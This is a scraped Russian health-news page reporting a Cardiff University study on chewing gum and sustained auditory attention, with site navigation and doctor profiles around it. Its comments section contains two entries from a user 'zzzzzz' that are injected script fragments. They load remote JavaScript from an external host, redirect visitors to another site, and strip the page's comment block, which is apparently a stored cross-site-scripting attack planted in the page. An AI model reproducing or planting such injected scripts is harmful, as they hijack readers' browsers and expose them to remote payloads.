Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Жевать жвачку неприлично?...  >>  Жевать жвачку неприлично? Теперь у вас есть повод жевать ее на работе!
 
Обратная связь
 

Жевать жвачку неприлично? Теперь у вас есть повод жевать ее на работе!

Размер шрифта
23 апреля 2013 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Жевательная резинка помогает сконцентрироваться при решении задач, требующих внимания в течение продолжительного времени. Это подтверждается недавними исследованиями, проведенными в Университете Кардифа.

Жевать жвачку неприлично? Теперь у вас есть повод жевать ее на работе

Ранее уже было доказано, что жевательная резинка улучшает концентрацию при выполнении визуальных задач. Сейчас же исследовалось влияние жвачки на выполнение слуховых заданий на память.

Кейт Морган, ведущий врач исследования поясняет: «Уже доказано влияние жевательной резинки на познавательную функцию мозга. В нашем исследовании мы обращали внимание именно на слуховые задачи, для которых требуется кратковременная память, и пытались понять, улучшает ли жвачка их выполнение, особенно в конце задания».

В исследовании участвовало 38 человек, которые были разделены на две группы. Обе группы слушали получасовой текст, представляющий собой случайную последовательность цифр от одного до девяти. Участники должны были регистрировать последовательность чисел «нечетное-четное-нечетное». Имели значение точность и скорость выполнения. Также участники заполняли опросники об их самочувствии и настроении до и после задания.

Результаты показали, что те, кто жевал жвачку, давали более точные и быстрые ответы, чем те, кто не жевал. Особенно большая разница в результатах была под конец задания, когда участники начали утомляться.

Интересно, что в самом начале задания лучшие результаты показывали исследуемые, не жующие жвачку. Это подтверждает то, что жевательная резинка улучшает концентрацию в случаях длительных заданий, которые требуют напряжения внимания, например, на работе.

Так что жуйте жвачку на работе, в университете и школе! И пусть кто-то попробует обозвать вас жвачным животным после этого!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вам скучно на работе? Это хорошо!   Быстрые решения для всего, что болтается и свисает   Сколько лет вашему телу   Как похудеть с помощью скандинавской ходьбы  
15 мая 2013Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал! 04 апреля 2013Когда делать зарядку, чтобы худеть быстрее
 
24 февраля 2012Физическая активность против выгорания на работе 26 января 2011Почему в старости спорт бесполезен
 

Слайдшоу

1
Еда, которая убивает вас. Изжога!
Мифы и факты о запоре
Шагомер OMRON Walking style One 2.1

Тесты

1
Что вы знаете о цистите?
Как контролировать бронхиальную астму
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.